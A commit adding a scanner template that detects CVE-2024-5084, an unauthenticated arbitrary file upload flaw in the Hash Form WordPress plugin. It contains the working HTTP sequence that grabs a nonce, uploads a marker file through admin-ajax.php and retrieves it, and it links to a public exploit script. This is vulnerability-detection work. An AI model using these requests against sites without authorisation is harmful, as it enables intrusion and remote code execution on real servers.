Merge pull request #10210 from Kazgangap/hashform

add CVE-2024-5084
patch-4
Dhiyaneshwaran 2024-07-10 11:34:09 +05:30 committed by GitHub
commit cb6f9fafc2
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 66 additions and 0 deletions

View File

@ -0,0 +1,66 @@
id: CVE-2024-5084
info:
name: Hash Form <= 1.1.0 - Arbitrary File Upload
author: securityforeveryone
severity: critical
description: |
The Hash Form Drag & Drop Form Builder plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the 'file_upload_action' function in all versions up to, and including, 1.1.0. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.
remediation: Fixed in 1.1.1
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-5084
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hash-form/hash-form-drag-drop-form-builder-110-unauthenticated-arbitrary-file-upload-to-remote-code-execution
- https://github.com/WOOOOONG/CVE-2024-5084/blob/main/CVE-2024-5084_exploit.py
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-5084
epss-score: 0.00063
epss-percentile: 0.27036
metadata:
verified: true
max-request: 1
vendor: HashThemes
product: Hash Form
framework: wordpress
publicwww-query: "/wp-content/plugins/hash-form/"
tags: cve,cve2024,wp-plugin,wordpress,file-upload,rce,intrusive
variables:
filename: "{{rand_base(5)}}"
num: "{{rand_int(1000, 9999)}}"
http:
- raw:
- |
GET / HTTP /1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
- |
POST /wp-admin/admin-ajax.php?action=hashform_file_upload_action&file_uploader_nonce={{nonce}}&allowedExtensions%5B0%5D=txt&sizeLimit=1048576&qqfile={{filename}}.txt HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
{{md5(num)}}
- |
GET /wp-content/uploads/hashform/temp/{{filename}}.txt HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
matchers:
- type: dsl
dsl:
- 'contains_all(body_2,"success","true","url") && status_code_2 == 200'
- 'contains(body_3,"{{md5(num)}}") && status_code_3 == 200'
condition: and
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- '"ajax_nounce":"([0-9a-z]+)","preview_img'
internal: true